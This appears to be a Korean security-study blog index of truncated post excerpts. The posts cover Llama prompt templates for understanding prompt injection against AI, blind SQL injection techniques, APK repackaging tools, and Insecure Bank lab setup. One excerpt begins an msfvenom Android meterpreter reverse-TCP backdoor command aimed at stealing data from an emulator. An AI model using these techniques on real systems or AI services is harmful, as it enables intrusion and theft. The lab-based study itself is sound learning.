안녕하세요! 오늘은 메타에서 오픈소스로 공개한 Llama 프롬프트 템플릿에 대하여 알아보겠습니다! 오픈소스로 공개되었기 때문에 이 모델로 학습시켜서 본인만의 AI 모델을 만들고 연구하는 사람들이 굉장히 늘어나고 있는 추세입니다. 따라서 현재 가장 접근하기 유용한 Llama를 통해 AI해킹에 대하여 공부하던 도중 프롬프트 인젝션이란 것을 알게되었습니다. 그래서 이 공격을 좀더 이해하기 위해선 프롬프트라는게 어떻게 구성되어있는지 알아야 겠다 판단이 되어 해당 게시글을 작성하게 되었습니다.1. AI 서비스 이용해보며 패킷 분석1. 우선 알아보기 전에 직접 AI서비스를 이용하여 패킷을 보며 어떤 정보가 오가는지 확인해보고 싶습니다. Llama 모델을 이용할 수 있는 사이트로는 아래의 리플리케이션 사이트를 이용했..

안녕하세요! 오늘은 kali Linux에 있는 metasploit 툴의 하나인 msfvenom을 통해서 백도어를 만든후 nox 프로그램에 잠입하여 민감한 정보를 탈취하는 것을 목표로 하는 포스팅입니다. ※ 해당 실습은 가상머신으로 이루어진 글입니다. 실제 외부 네트워크에서 진행할 시 불법이므로 모든 책임은 본인에게 있습니다. 우선 준비물은 아래와 같습니다.Kali LinuxNox 앱플레이어1. 우선 칼리리눅스를 실행합니다. 2. 명령어창의 ifconfig 명령어를 입력하여 Kali의 IP Address 를 확인합니다. 3. 이후 아래의 명령어를 사용하여 백도어 앱을 만들어줍니다. 사용된 명령어는 아래와 같습니다.명령어 : msfvenom -p android/meterpreter/reverse_Tcp LH..

안녕하세요! 오늘은 블라인드 SQL인젝션을 진행할 때 알아두면 좋은 두가지를 포스팅하려고 합니다.  이번 포스팅 내용은 다음과 같습니다.이진탐색기법Bit연산기법1. 이진탐색기법> 이진탐색이란 정렬된 리스트에서 임의의 값을 효율적으로 찾기 위한 알고리즘 입니다. 0부터100 사이의 임의의값을 찾으려 하는경우 0 > 1 > 2 > 3 ..... 이런식으로 차례대로 계산하면 너무 비효율적입니다. 그래서 중앙값인 50 보다 크냐 작으냐를 먼저 비교후, 만약 크다면 이후 또 중앙값인 75보다 크냐 작으냐 하는 식으로 중앙값과 비교를 통해 범위를 줄여나간다면 보다 빠르게 임의의값을 찾아낼 수 있을것입니다. 아래 그림은 위 설명을 도식화 한 것입니다. > 파이썬 코드로 표현한 이진탐색 기법 아래는 위에 그림을 파이썬..

안녕하세요! SQL 인젝션에 대하여 공부를 하던중 제가 미숙한 SQL 문법을 발견해서 실험을 해본 내용을 남기는 글입니다!해당 내용을 공부하며 Blind SQL 인젝션 진행시 ASCII를 굳이 쓸 필요 없이 if구문을 를 사용할 수도 있다는 것을 깨달았습니다. if 문으로 참 거짓이 바뀌는 것을 통해 Blind SQL 인젝션을 진행할때 사용해볼 수 있을것 같습니다. 개인적으로 ascii 값을 비교해서 하는방법이 힘들었는데 그것보다는 편해서 종종 이용해볼 것 같습니다 :) SQL 인젝션 공부중 문자 하나만 출력해야 하는 상황에서 드는 의문이 있었습니다. SQL 구문 결과값을 한문자만 출력하거나 TRUE , FALSE 로 출력하려면 어떻게 해야할까?실험 1. 우선 기존의 로그인을 시도한다면 아래와 같은 구문..

안녕하세요! 오늘은 APK Easy Tool 설치방법에 대하여 알려드리려고 포스팅하였습니다! APK Easy Tool을 사용하면 저희가 기존에 하던 디컴파일 → smail 수정 → 컴파일 → 사인 과정을 버튼클릭 만으로 진행할 수 있게됩니다. 원래는 명령어창에서 명령어로 입력하고 경로 설정하고 여간 귀찮은게 아니였는데 이제 그 과정을 대폭 줄일수 있게되었습니다!! 아래 링크를 클릭하면 기존 APK Tool 로 리패키징 하는 방법이 있습니다. 엄청 귀찮은 과정이죠!.. 기존 APK tool로 리패키징 하는 방법 APK 디컴파일 & 리패키징(APK Tool)이번에는 디컴파일 후 파일을 수정하고 리패키징까지 할 수 있는 방법을 사용해보려고 한다. 이 방법은 smali 라는 어셈블리 파일을 수정해야 하기에 조금..

이전 게시물과 이어지는 내용입니다!이전게시물 우선 Insecure Bank 를 설치하기 위해선 3가지가 필요합니다.Nox 앱플레이어Miniconda (python2 사용을 위해)Insecure APK (Github 에서 다운로드)만약 Nox 앱플레이어가 설치 안되어있으시면 아래 링크로 이" data-og-host="jamesbexter.tistory.com" data-og-source-url="https://jamesbexter.tistory.com/entry/Insecure-Bank-%EC%84%A4%EC%B9%98%EB%B0%A9%EB%B2%95%ED%99%98%EA%B2%BD%EC%85%8B%ED%8C%85-%EB%B6%80%ED%84%B0-%EC%B7%A8%EC%95%BD%EC%A0%90-%EC%..

> 우선 Insecure Bank 를 설치하기 위해선 3가지가 필요합니다.Nox 앱플레이어Miniconda (python2 사용을 위해)Insecure APK (Github 에서 다운로드)만약 Nox 앱플레이어가 설치 안되어있으시면 아래 링크로 이동하셔서 Nox를 설치하시고 와주세요! 설치를 하셨다면 남은 두개를 설치하는 과정을 아래서 설명해놓았으니 따라오시면 됩니다. https://kr.bignox.com/ Noxplayer – Fastest and Smoothest Android Emulator for PC & Mac – Free and SafePlay the most popular mobile games and run apps on PC with NoxPlayer, the best Android E..